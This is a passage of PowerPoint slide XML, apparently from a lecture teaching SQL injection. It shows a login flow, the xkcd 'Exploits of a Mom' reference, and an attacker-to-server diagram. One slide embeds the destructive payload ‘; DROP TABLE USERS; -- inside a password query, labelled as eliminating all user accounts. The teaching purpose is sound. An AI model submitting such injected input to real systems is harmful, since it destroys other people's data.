            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Normal Login</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="267418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8444505-97B1-2545-814F-38C32E038F1A}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" dirty="0"/>
              <a:t>Malicious User Input</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="41987" name="Picture 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C34C7972-6D2B-6A49-9470-249A3B8EE70B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId3"/>
          <a:srcRect l="-3807" r="-13399"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="1066800" y="2014194"/>
            <a:ext cx="10058400" cy="414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a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{EFBFC6E2-C49F-4546-8B02-FA65BAD30289}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3507475" y="3818534"/>
            <a:ext cx="3392275" cy="461665"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2400" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>‘; DROP TABLE USERS; --</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="TextBox 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{BBDB10B4-7D5C-F541-B14A-47AF2DB39D4B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3507474" y="4471271"/>
            <a:ext cx="1435008"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704515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8">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D087C76C-BCE1-D64F-A02F-02C3C9ACE3A2}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="3824790" y="2286001"/>
            <a:ext cx="134043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Enter </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="ctr">
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2000">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
              </a:rPr>
              <a:t>Username </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="ctr">
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2000">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
              </a:rPr>
              <a:t>&amp; </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="ctr">
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2000">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
              </a:rPr>
              <a:t>Password</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="46083" name="Rectangle 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{CD13E7ED-D067-934B-B2E0-C48F0F8BE9A9}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US"/>
              <a:t>SQL Injection Attack</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="46084" name="Rectangle 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{6808273B-0342-614A-BDDB-BFCE32EB373D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="50927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a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="ctr">
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2000">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
              </a:rPr>
              <a:t>server</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="46085" name="Rectangle 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{035475A3-D1CF-824B-9AFA-41E0116230BB}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="2438401" y="2444750"/>
            <a:ext cx="139541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Web </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="ctr">
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2000">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
              </a:rPr>
              <a:t>browser</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="ctr">
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2000">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
              </a:rPr>
              <a:t>(Client)</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="46086" name="Rectangle 5">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F102F954-D55A-CD4F-BF7D-27C5004C2A19}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="8597901" y="2444750"/>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DB</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="46087" name="Line 6">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C01C2DB0-A64C-AD49-BF1F-62650F47E021}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noChangeShapeType="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="3814764" y="3886200"/>
            <a:ext cx="1298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88" name="Line 7">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{60C84BD8-D111-B241-85C0-EF6D1539F920}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noChangeShapeType="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm flipH="1">
            <a:off x="3848100" y="4418013"/>
            <a:ext cx="11811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89" name="Rectangle 9">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{AA3B4C19-DE26-BC49-B5E1-9E140A7D080B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="6438219" y="1981200"/>
            <a:ext cx="207781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dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
              </a:rPr>
              <a:t>SELECT passwd </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="ctr">
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
              </a:rPr>
              <a:t>FROM USERS</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="ctr">
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
              </a:rPr>
              <a:t>WHERE </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2000" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
              </a:rPr>
              <a:t>uname</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="ctr">
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
              </a:rPr>
              <a:t>IS ‘</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2000" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
              </a:rPr>
              <a:t>’; </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2000" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
              </a:rPr>
              <a:t>DROP TABLE</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="ctr">
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2000" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
              </a:rPr>
              <a:t>USERS; </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2000" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
              </a:rPr>
              <a:t>-- </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
              </a:rPr>
              <a:t>’</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="46090" name="Line 10">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{70FF8819-2830-404C-AD7A-579F317B55EA}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noChangeShapeType="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="6372226" y="3886200"/>
            <a:ext cx="22129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091" name="Line 11">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{672F8295-C57F-8047-BE94-14078B0F059B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noChangeShapeType="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm flipH="1">
            <a:off x="6405563" y="4381500"/>
            <a:ext cx="21193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3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{95966FF0-1725-4D45-98BA-BF9F8BF91FFE}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="5943600" y="3001963"/>
            <a:ext cx="2971800" cy="792162"/>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15" name="Line 14">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{4BFC8CAE-2DBA-DA4F-B22F-6457FBA3BCF0}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noChangeShapeType="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="7162801" y="3794125"/>
            <a:ext cx="449263" cy="1277938"/>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5">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{03403CB6-1C71-A941-A393-BBF586AF5605}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="6781800" y="4968876"/>
            <a:ext cx="269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spcBef>
                <a:spcPct val="50000"/>
              </a:spcBef>
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
              </a:rPr>
              <a:t>Eliminates all user accounts</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2960829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E337EED8-7A63-0340-BE2D-6CF043CEDADF}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US"/>
              <a:t>Exploits of a Mom</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="47109" name="Picture 6" descr="mom">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{1B0B28F5-F0A3-E146-BB53-6FAA61E40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8" y="2438400"/>
            <a:ext cx="8456612"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DAB8826-841B-4149-95ED-A233B7C8048D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="9623593" y="6046129"/>
            <a:ext cx="1997663" cy="338554"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1600" i="1" dirty="0"/>
              <a:t>http://</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1600" i="1" dirty="0" err="1"/>
              <a:t>xkcd.com</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1600" i="1" dirty="0"/>
              <a:t>/327/</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1047660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4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C11A0C37-A3BC-5244-85C9-5C371B374BE8}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US"/>
              <a:t>SQL Injection: Basic Idea</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="48131" name="Picture 18" descr="toshiba_satellite_a105_s4284_laptop">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{DF439147-73F2-3B48-875E-501956645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914" y="2667000"/>
            <a:ext cx="1436687"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11" descr="CompaqAlphaServerES40">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{1006A583-5E76-E642-BCB4-587A6A389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438" y="4572001"/>
            <a:ext cx="11557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4" descr="DS15serverfront">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{13A91603-2BB8-0E4A-BAF1-F6FDAE0A0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1" y="1905000"/>
            <a:ext cx="2436813"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 Box 6">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{0BE59F7F-E966-6942-AF5A-BD661C0A2304}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="7313613" y="1524000"/>
            <a:ext cx="1563248" cy="400110"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:buFontTx/>
              <a:buNone/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>Victim server</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="14344" name="Text Box 6">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{276C3589-AB3A-EA41-9C76-EE381AE30E05}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="8024814" y="6000750"/>
            <a:ext cx="1739579" cy="400110"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:buFontTx/>
              <a:buNone/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>Victim SQL DB</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="48136" name="Straight Arrow Connector 17">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{8279F088-1CA9-E44F-90F7-2E9CC0F2082D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks noChangeShapeType="1"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm flipV="1">
            <a:off x="3951288" y="2257425"/>
            <a:ext cx="2830512" cy="61753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346" name="Text Box 6">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{3FC886B6-4802-BE4F-AFC5-BA66A4715E3C}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="2220913" y="2257425"/>
            <a:ext cx="1069524" cy="400110"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:buFontTx/>
              <a:buNone/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000"/>
              <a:t>Attacker</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="14347" name="TextBox 19">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{CA9D5994-CFCB-9E44-8B96-1A11F3263236}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm rot="-709076">
            <a:off x="4176588" y="2070070"/>
            <a:ext cx="2291012" cy="400110"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:buFontTx/>
              <a:buNone/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>post malicious form</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="48139" name="Straight Arrow Connector 20">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{8CEE8A46-0C55-5942-810B-FFF4C59257D2}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks noChangeShapeType="1"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm rot="5400000">
            <a:off x="7708901" y="3651251"/>
            <a:ext cx="1801812" cy="158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349" name="TextBox 24">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{6F3D4613-28B1-2948-99D2-B2D0E22B0BD3}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
